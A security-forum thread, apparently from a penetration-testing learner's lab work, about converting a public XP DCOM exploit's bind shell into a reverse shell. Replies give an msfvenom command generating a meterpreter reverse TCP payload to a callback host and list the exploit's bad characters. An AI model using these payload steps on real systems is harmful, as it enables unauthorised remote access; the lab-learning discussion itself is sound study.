Thread: XP DCOM custom windows reverse shell exploit issue

  1. #1

    XP DCOM custom windows reverse shell exploit issue

    Hi Everyone,

    I am trying to modify the exploit located here: https://www.exploit-db.com/exploits/66/
    What I am trying to do is replace the existing bind shell on port 4444 with my reverse shell hex chars, but I am facing an issue with finding out the bad chars for this exploit
    and the return address. Can you please help me convert this exploit into a reverse shell exploit? And also, how can I go about the return address for this type of public exploit?

    thanks in advance

  2. #2
    b0nd (... I am no Expert, b0nd.g4h@gmail.com)
    Join Date: Jul 2010 | Location: irc.freenode.net #g4h | Posts: 744
    Do hit-n-trial for bad chars.
    For return address, which OS are you using?

    Cheers!
    [*] To follow the path: look to the master, follow the master, walk with the master, see through the master,
    ------> become the master!!! <------
    [*] Everyone has a will to WIN but very few have the will to prepare to WIN
    [*] Invest yourself in everything you do, there's fun in being serious

  3. #3
    I can do hit and trial, but there are many hex chars and it is very time consuming, and here the issue is I cannot even use Immunity to see the register dump so as to identify the bad char. Are there any other ways to go about this?

    I am using Kali for exploiting an XP machine.

    Any suggestions for the return address?

  4. #4

    How to use MSFVENOM for a reverse shell.

    Very first, wget the exploit code onto your machine and try to run the exploit. If it opens the bind port successfully, then go for updating the exploit with the reverse shell code.

    Code:
    netstat -an | find "4444"
    If you would like to generate a quick reverse shell, I would suggest you use msfvenom:

    Code:
    msfvenom --platform windows -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.0.1 LPORT=443 -b "\x00" -f raw
    And also I would suggest you look into the size of the shellcode which you generated or developed. Depending on the existing default exploit shellcode size, add or remove NOPs.

    I hope this will help you.
    Garage4Hackers: bugs for the community, of the community

  5. #5
    Hi [S],

    I actually tried this before asking the query here, however failed to exploit.
    One of the reasons for failing was the bad characters, as there are more bad characters than just "\x00". I have got the list of bad characters now: while checking out the same exploit in the Metasploit directories, they have mentioned all the bad characters. Below are the bad chars:

    \x00\x0a\x0d\x5c\x5f\x2f\x2e

    I haven't reworked this, but will do once I get free from the lab.

    If anybody in the forum gets a chance to try this, then please share your experience.

  6. #6
    b0nd (... I am no Expert, b0nd.g4h@gmail.com)
    Join Date: Jul 2010 | Location: irc.freenode.net #g4h | Posts: 744
    Quote Originally Posted by mayank7651:
    Hi [S],

    I actually tried this before asking the query here, however failed to exploit.
    One of the reasons for failing was the bad characters, as there are more bad characters than just "\x00". I have got the list of bad characters now: while checking out the same exploit in the Metasploit directories, they have mentioned all the bad characters. Below are the bad chars:

    \x00\x0a\x0d\x5c\x5f\x2f\x2e

    I haven't reworked this, but will do once I get free from the lab.

    If anybody in the forum gets a chance to try this, then please share your experience.
    (end of quote)

    Thanks for the feedback!
    Best wishes for your labs & exam.